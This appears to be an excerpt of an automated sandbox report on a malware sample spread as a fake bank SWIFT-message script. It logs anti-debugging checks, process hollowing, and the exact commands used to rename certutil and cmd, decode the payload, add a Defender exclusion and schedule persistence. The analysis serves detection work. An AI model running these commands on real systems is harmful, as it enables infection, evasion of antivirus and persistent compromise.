                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99219
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98582
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98438
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98304
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98168
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98045
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97927
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97781
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97664
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97532
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97406
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97182
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97026
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96812
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96656
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96343
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99745
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99602
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99377
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99201
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99020
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98882
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98763
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98611
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 98203
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97675
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97541
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97334
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 97127
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96946
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96835
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96705
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96577
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96462
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96340
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 96227
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199861
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199737
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1199475
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198803
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198580
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198358
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198228
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1198114
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197990
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197862
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197676
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197542
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 1197409
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                      Source: Trading_AIBot.exe, 0000001C.00000002.1925787227.0000000000676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: AnyDesk.PIF, 0000000F.00000002.1438483669.000000000072E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1438483669.0000000000776000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1671554785.000000000068E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2158884710.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2601733139.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1976473773.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1945026422.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1926425166.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2066404539.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.1570665204.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2476312068.0000000000589000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Native_neworigin.exe, 0000001B.00000002.1671554785.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information queried: ProcessInformation

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,15_2_02E0F744
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706ED63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,9_2_00007FF706ED63FC
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0894C LoadLibraryW,GetProcAddress,FreeLibrary,15_2_02E0894C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC4A14 GetEnvironmentStringsW,GetProcessHeap,HeapAlloc,memmove,FreeEnvironmentStringsW,9_2_00007FF706EC4A14
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC93B0 SetUnhandledExceptionFilter,9_2_00007FF706EC93B0
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF706EC8FA4
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC93B0 SetUnhandledExceptionFilter,11_2_00007FF706EC93B0
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF706EC8FA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B54E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF627B54E18
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B553E0 SetUnhandledExceptionFilter,12_2_00007FF627B553E0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC93B0 SetUnhandledExceptionFilter,16_2_00007FF706EC93B0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF706EC8FA4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC93B0 SetUnhandledExceptionFilter,17_2_00007FF706EC93B0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_00007FF706EC8FA4
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Allocates memory in foreign processes
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                      Drops or copies certutil.exe with a different name (likely to bypass HIPS)
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                      Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Sample uses process hollowing technique
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                      Writes to foreign memory regions
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 28A008Jump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 28B008
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 332008
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B07024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,12_2_00007FF627B07024
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: unknown unknown
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: unknown unknown
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess created: unknown unknown
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF4AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,12_2_00007FF627AF4AF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B04E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,12_2_00007FF627B04E98
                      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,9_2_00007FF706EC51EC
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,9_2_00007FF706EC3140
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,9_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF706EC51EC
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF706EC3140
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF706EB6EE4
                      Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,12_2_00007FF627B53800
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,15_2_02DF5ACC
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,15_2_02DFA7C4
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,15_2_02DF5BD8
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,15_2_02DFA810
                      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,16_2_00007FF706EC51EC
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,16_2_00007FF706EC3140
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,16_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,17_2_00007FF706EC51EC
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,17_2_00007FF706EC3140
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,17_2_00007FF706EB6EE4
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
